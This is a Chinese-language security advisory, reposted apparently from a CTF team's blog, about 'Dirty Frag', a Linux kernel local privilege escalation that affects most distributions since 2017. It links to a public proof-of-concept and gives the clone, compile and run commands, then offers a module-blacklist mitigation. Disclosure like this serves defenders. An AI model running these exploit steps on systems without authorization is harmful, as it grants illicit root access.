高危!新一代“脏管道”漏洞来袭,几乎所有Linux系统秒破Root

admin
admin
admin
0
文章
0
评论
2026-05-11 09:14:12 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 文档披露了Linux内核高危漏洞DirtyFrag,该漏洞属于逻辑型本地提权漏洞,无需竞争条件即可稳定获取root权限,影响2017年以来几乎所有主流Linux发行版。文章提供了漏洞复现步骤与POC地址,并给出通过禁用esp4、esp6、rxrpc内核模块的临时防护命令,建议用户及时采取缓解措施。 综合评分: 85 文章分类: 漏洞分析,漏洞预警,应急响应,解决方案,Linux安全

cover_image

高危!新一代 “脏管道” 漏洞来袭,几乎所有 Linux 系统秒破 Root

原创

OnePanda-Sec OnePanda-Sec

OnePanda-Sec

2026年5月8日 13:53 陕西

在小说阅读器读本章

去阅读

OnePanada-Sec 招新啦

招新要求

  • 热爱网络安全,喜欢 CTF;
  • 拥有 CTF 比赛经验,有较好比赛成绩的;
  • 乐于奉献、热爱分享,愿意提升自己同时帮助他人;
  • 时间允许参加各类赛事,服从战队管理与安排;
  • 各类比赛获奖者、能力出众者视情况考量;
  • 未参与其他高校联队;
  • 大一同学视情况放宽资历要求。

联系方式

请将个人简历发送至以下邮箱:

简历邮箱:[email protected]

PART 02

🔍 漏洞简介:Dirty Frag

Dirty Frag 是一个通用的 Linux 本地提权漏洞,与脏管道(Dirty Pipe)、Copy Fail 属于同一系列漏洞大类。它的特点非常 “狠”:

  • 是确定性逻辑漏洞,不依赖时间竞争窗口、无需壳态条件
  • 漏洞利用失败时不会触发内核崩溃
  • 整体利用成功率极高,堪称新一代 “Linux 提权神器”

该漏洞影响范围极广,2017 年以来几乎所有主流 Linux 发行版均受影响,攻击者可以通过漏洞链实现对页缓存的写入,从而稳定提权至 root 权限。

PART 03

🛠️ 漏洞复现

复现版本

POC地址

https://github.com/V4bel/dirtyfrag

POC复现

git clone https://github.com/V4bel/dirtyfrag.git

cd dirtyfrag

gcc -O0 -Wall -o exp exp.c -lutil

./exp

PART 04

⚠️ 高危!受影响版本与临时防护方案

🔴 受影响范围:覆盖近 9 年主流内核

Dirty Frag 系列漏洞的影响周期极长,覆盖了多个上游内核提交引入的问题:

  • xfrm-ESP

    页缓存写入漏洞:影响内核提交 cac2661c53f3(2017-01-17)至今 的所有上游内核版本

  • RxRPC

    页缓存写入漏洞:影响内核提交 2dc334f1a63a(2023年6月)至今 的所有上游内核版本

整体来看,漏洞影响周期长达约 9 年,几乎所有主流 Linux 发行版都难逃其外,实测可利用的版本包括:

  • Ubuntu 24.04.4:6.17.0-23-generic
  • RHEL 10.1:6.12.0-124.49.1.el10_1.x86_64
  • openSUSE Tumbleweed:7.0.2-1-default
  • CentOS Stream 10:6.12.0-224.el10.x86_64
  • AlmaLinux 10:6.12.0-124.52.3.el10_1.x86_64
  • Fedora 44:6.19.14-300.fc44.x86_64
  • ……

🛡️ 临时防护方案(无官方补丁时)

因负责任的漏洞披露流程及保密协议已提前失效,目前所有 Linux 发行版均无官方补丁。可执行以下命令,禁用存在漏洞的内核模块做临时防护:

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' >> /etc/modprobe.d/blacklist-dirtyfrag.conf"

执行后重启系统即可生效,可有效阻断漏洞利用路径,为等待官方补丁争取时间。

PART 05

微信QQ交流群

欢迎大家加入[ OnePanda-Sec ] 群聊一起交流 ^ ^

END

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:OnePanda-Sec OnePanda-Sec OnePanda-Sec《高危!新一代 “脏管道” 漏洞来袭,几乎所有 Linux 系统秒破 Root》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
【上新】终极困局? 网络安全文章

【上新】终极困局?

文章总结: 该报告探讨现代混合战争背景下大国运用经济与军事手段施压的战略课题,提出通过政治、经济、外交、社会等多维度韧性建设避免战争升级的分析框架,并附兵棋推演
05-110 评论
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0